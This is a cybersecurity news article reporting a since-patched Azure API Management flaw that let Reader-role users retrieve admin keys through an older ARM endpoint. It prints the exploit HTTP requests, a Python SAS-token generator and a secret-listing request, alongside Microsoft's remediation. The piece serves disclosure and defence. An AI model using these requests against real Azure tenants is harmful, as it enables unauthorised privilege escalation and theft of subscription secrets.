Saturday, December 14, 2024
Homecyber securityAzure API Management Vulnerability Let Attackers Escalate Privileges

Azure API Management Vulnerability Let Attackers Escalate Privileges

Published on

SIEM as a Service

A vulnerability in Azure API Management (APIM) has been identified. It allows attackers to escalate privileges and access sensitive information.

This issue arises from a flaw in the Azure Resource Manager (ARM) API, which permits unauthorized access to critical resources.

This article delves into the specifics of the vulnerability, its implications, and the steps taken to mitigate the risk.

- Advertisement - SIEM as a Service

Understanding the ARM API Vulnerability

The Azure Resource Manager (ARM) API manages Azure resources, including APIM instances.

When users with Reader permissions access an APIM resource, the ARM API typically restricts certain actions, as a report by BinarySecurity.

Decoding Compliance: What CISOs Need to Know – Join Free Webinar

Generating another key for it, which can not be done by users with “reader”-access.
Generating another key for it, which can not be done by users with “reader”-access.

However, older versions of the ARM API allowed users with Reader access to view all subscription keys, read client credentials of identity provider service principals, and access keys for the Direct Management API.

The bug is as simple as finding the right ARM API endpoint and calling it with “Reader”-privileges.
The bug is as simple as finding the right ARM API endpoint and calling it with “Reader”-privileges.

To address these issues, Microsoft introduced a feature to enforce a minimum ARM API version, thereby blocking older, vulnerable versions.

By setting this restriction to an API version newer than 2020, users with Reader access are prevented from viewing subscription keys and other sensitive information.

Despite these measures, a bug bypassed these restrictions by allowing access to admin user keys.

The Direct Management API: A Closer Look

The Direct Management API is a crucial component of an APIM instance. It enables operations on entities such as users, groups, products, and subscriptions.

An Admin user is created with extensive permissions over these entities by default. The vulnerability lies in the ability of users with Reader privileges to exploit an overlooked ARM API endpoint and gain unauthorized access.

Here is an example of how attackers could exploit this vulnerability:

GET /subscriptions/<subscription>/resourceGroups/<resource_group>/providers/Microsoft.ApiManagement/service/<instance_name>/users/1/keys?api-version=2023-03-01-preview HTTP/2
Host: management.azure.com
Authorization: Bearer <legitimate_arm_bearer_token>

This request allows attackers to retrieve admin user keys and generate Shared Access Signatures (SAS), granting further access to sensitive data.

Demonstrating the Exploit

The vulnerability can be demonstrated by accessing admin user keys and generating SAS tokens.

These tokens can be used to interact with the APIM Management API and perform unauthorized actions:

def get_expiry(self):
    return (datetime.datetime.utcnow() + datetime.timedelta(hours=24)).strftime("%Y-%m-%dT%H:%M:%S.0000000Z")
def generate_apim_sas_token(self, key, uid, version=1):
    exp = self.get_expiry()
    if version == 1:
        message = f"uid={uid}&ex={exp}"
        message_to_sign = f"{uid}\n{exp}"
        signature = base64.b64encode(self.hmac_sha512(message_to_sign, key)).decode("utf-8")
        sas_token = f"{message}&sn={signature}"
    return sas_token

With these tokens, attackers can list subscription keys or identity provider keys:


/subscription/0/resourceGroups/0/providers/Microsoft.ApiManagement/service/0/subscriptions/<sub_id>/listSecrets?api-version=2022-08-01 HTTP/1.1
Host: <service>.management.azure-api.net
Authorization: SharedAccessSignature uid=1&ex=2024-05-01T00:00:00:000000Z&sn=ABCDEFG==
Content-Length: 0
Content-Type: application/json

Remediation and Future Precautions

Microsoft addressed this vulnerability by restricting the ARM API for users with Reader privileges.

The fix was implemented swiftly and retroactively applied to all APIM instances. Despite this resolution, similar vulnerabilities may emerge in the future.

To enhance security and build defense in depth, it is recommended that critical Azure resources be made private and accessible only from their virtual networks (VNETs).

Additionally, organizations should consider deploying security measures such as CI/CD runners to monitor and manage resource access.

The vulnerability was classified as having a vital severity level with a security impact of elevation of privilege.

As cloud environments evolve, vigilance and proactive security measures remain essential in protecting sensitive data and maintaining system integrity.

Simulating Cyberattack Scenarios With All-in-One Cybersecurity Platform – Watch Free Webinar

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

“Password Era is Ending,” Microsoft to Delete 1 Billion Passwords

Microsoft has announced that it is currently blocking an astounding 7,000 password attacks every...

Over 300,000 Prometheus Servers Vulnerable to DoS Attacks Due to RepoJacking Exploit

The research identified vulnerabilities in Prometheus, including information disclosure from exposed servers, DoS risks...

Reyee OS IoT Devices Compromised: Over-The-Air Attack Bypasses Wi-Fi Logins

Researchers discovered multiple vulnerabilities in Ruijie Networks' cloud-connected devices. By exploiting these vulnerabilities, attackers...

New Android Banking Malware Attacking Indian Banks To Steal Login Credentials

Researchers have discovered a new Android banking trojan targeting Indian users, and this malware...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

“Password Era is Ending,” Microsoft to Delete 1 Billion Passwords

Microsoft has announced that it is currently blocking an astounding 7,000 password attacks every...

Over 300,000 Prometheus Servers Vulnerable to DoS Attacks Due to RepoJacking Exploit

The research identified vulnerabilities in Prometheus, including information disclosure from exposed servers, DoS risks...

Reyee OS IoT Devices Compromised: Over-The-Air Attack Bypasses Wi-Fi Logins

Researchers discovered multiple vulnerabilities in Ruijie Networks' cloud-connected devices. By exploiting these vulnerabilities, attackers...